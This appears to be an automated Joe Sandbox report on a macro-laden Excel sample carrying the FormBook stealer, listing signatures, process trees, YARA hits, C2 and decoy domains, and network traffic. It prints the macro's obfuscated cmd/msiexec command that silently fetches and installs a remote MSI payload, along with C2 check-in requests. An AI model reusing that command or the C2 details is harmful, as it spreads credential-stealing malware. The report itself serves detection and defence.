Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 0d69e4f6_by_Libranalysis

Overview

General Information

Sample Name:0d69e4f6_by_Libranalysis (renamed file extension from none to xls)
Analysis ID:402839
MD5:0d69e4f684735cf4f187659ee0882fd8
SHA1:55a52f6971084224e3030b76cd44d13b0203b749
SHA256:0c856e57da034a8943b4065297d075365090d9eb925abb7ba74dd3df9acefc1f
Tags:Formbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
DLL side loading technique detected
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1276 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2948 cmdline: 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • msiexec.exe (PID: 2892 cmdline: mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn MD5: AC2E7152124CEED36846BD1B6592A00F)
  • MSID8B1.tmp (PID: 3012 cmdline: C:\Windows\Installer\MSID8B1.tmp MD5: 12AB5A6E917A80D7B94F2EBE725A4B23)
    • MSID8B1.tmp (PID: 2472 cmdline: C:\Windows\Installer\MSID8B1.tmp MD5: 12AB5A6E917A80D7B94F2EBE725A4B23)
      • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
      • wininit.exe (PID: 2268 cmdline: C:\Windows\SysWOW64\wininit.exe MD5: B5C5DCAD3899512020D135600129D665)
        • cmd.exe (PID: 2252 cmdline: /c del 'C:\Windows\Installer\MSID8B1.tmp' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.MSID8B1.tmp.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.MSID8B1.tmp.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.MSID8B1.tmp.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x175f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1770c:$sqlite3step: 68 34 1C 7B E1
        • 0x17628:$sqlite3text: 68 38 2A 90 C5
        • 0x1774d:$sqlite3text: 68 38 2A 90 C5
        • 0x1763b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17763:$sqlite3blob: 68 53 D8 7F 8C
        6.2.MSID8B1.tmp.710000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.MSID8B1.tmp.710000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a517:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b51a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: www.111bjs.com/ccr/Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.111bjs.com/ccr/"], "decoy": ["abdullahlodhi.com", "jevya.com", "knoxvillerestaurant.com", "mekarauroko7389.com", "cricketspowder.net", "johannchirinos.com", "orangeorganical.com", "libero-tt.com", "lorenaegianluca.com", "wintab.net", "modernmillievintage.com", "zgdqcyw.com", "jeffabildgaardmd.com", "nurulfikrimakassar.com", "findyourchef.com", "innovationsservicegroup.com", "destek-taleplerimiz.com", "whfqqco.icu", "kosmetikmadeingermany.com", "dieteticos.net", "savarsineklik.com", "newfashiontrends.com", "e-mobilitysolutions.com", "spaced.ltd", "amjadalitrading.com", "thejstutor.com", "zzhqp.com", "exoticomistico.com", "oklahomasundayschool.com", "grwfrog.com", "elementsfitnessamdwellbeing.com", "auldontoyworld.com", "cumhuriyetcidemokratparti.kim", "thetruthinternational.com", "adimadimingilizce.com", "retreatwinds.com", "duoteshop.com", "jasonkokrak.com", "latindancextreme.com", "agavedeals.com", "motz.xyz", "kspecialaroma.com", "yuejinjc.com", "print12580.com", "ampsports.tennis", "affordablebathroomsarizona.com", "casnop.com", "driftwestcoastmarket.com", "bjsjygg.com", "gwpjamshedpur.com", "reserveacalifornia.com", "caobv.com", "culturaenmistacones.com", "back-upstore.com", "jjsmiths.com", "iamxc.com", "siobhankrittiya.com", "digitalakanksha.com", "koatku.com", "shamushalkowich.com", "merplerps.com", "fishexpertise.com", "sweetheartmart.com", "nqs.xyz"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 0d69e4f6_by_Libranalysis.xlsReversingLabs: Detection: 38%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 0d69e4f6_by_Libranalysis.xlsJoe Sandbox ML: detected
          Source: 7.2.MSID8B1.tmp.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.MSID8B1.tmp.710000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.1.MSID8B1.tmp.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wininit.pdb source: MSID8B1.tmp, 00000007.00000003.2147755225.0000000000520000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: MSID8B1.tmp, wininit.exe

          Software Vulnerabilities:

          barindex
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop edi9_2_00097D24
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop edi9_2_00097D7A
          Source: global trafficDNS query: name: cdn.discordapp.com
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.0.78.25:80
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.0.78.25:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 192.0.78.25:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.111bjs.com/ccr/
          Source: global trafficHTTP traffic detected: GET /ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn HTTP/1.1Host: www.adimadimingilizce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn HTTP/1.1Host: www.destek-taleplerimiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 192.0.78.25 192.0.78.25
          Source: Joe Sandbox ViewIP Address: 99.83.154.118 99.83.154.118
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOn HTTP/1.1Host: www.adimadimingilizce.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOn HTTP/1.1Host: www.destek-taleplerimiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
          Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2107572712.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: msiexec.exe, 00000004.00000002.2097975295.0000000000330000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2098042878.00000000003BA000.00000004.00000020.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi
          Source: msiexec.exe, 00000004.00000002.2098087183.0000000000566000.00000004.00000001.sdmp, msiexec.exe, 00000004.00000002.2098074405.0000000000466000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qn
          Source: msiexec.exe, 00000004.00000002.2097965804.0000000000324000.00000004.00000040.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qnG

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2149114230.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000001.2092255175.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2149002116.0000000000340000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2344479784.0000000001EF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Document contains an embedded VBA macro which may execute processesShow sources
          Source: 0d69e4f6_by_Libranalysis.xlsOLE, VBA macro line: vku22t7AsavSAtE_rIC_Ltzl_ac4OZD6Y8kFqCHZ4Ws6KEqj_aJDvoCDtI1bOBuRVz4CH8Tn_mIy_3Y3_2IxN = ywPoSobDlP42oHWDPKpiAOl6vutg4GnFgWlXDXop_JC4yy5LjDxxLctjLTzh55HdnvUQh8_2g9wzLrE7yf7zRw3DnAKtg.Run(khIimJ_GTwcaRVcTR2Q2itkUKSGNZlvtyyEUgyO_qkFaFk28ao4eaCr16x, a_JK2JrDQTw6_KnVD_Z_K5m6VNcmCppFaTS_ReJjuMTATYVxRbVmh__ebMyor__mpqfa1mCi3z88llm61oSlRBjajxi_pf1qLrUo3)
          Source: VBA code instrumentationOLE, VBA macro: Module AK2_oiMjTt8L, Function WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP, API IWshShell3.Run("CMd /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn ",0:Integer)Name: WSBfss_tkcPGwcnKL7lINlZHv_rRRvHNXrb6BI1XaW9ZsSza1NytP
          Source: C:\Windows\Installer\MSID8B1.tmpMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\Installer\MSID8B1.tmpMemory allocated: 76E20000 page execute and read and writeJump to behavior
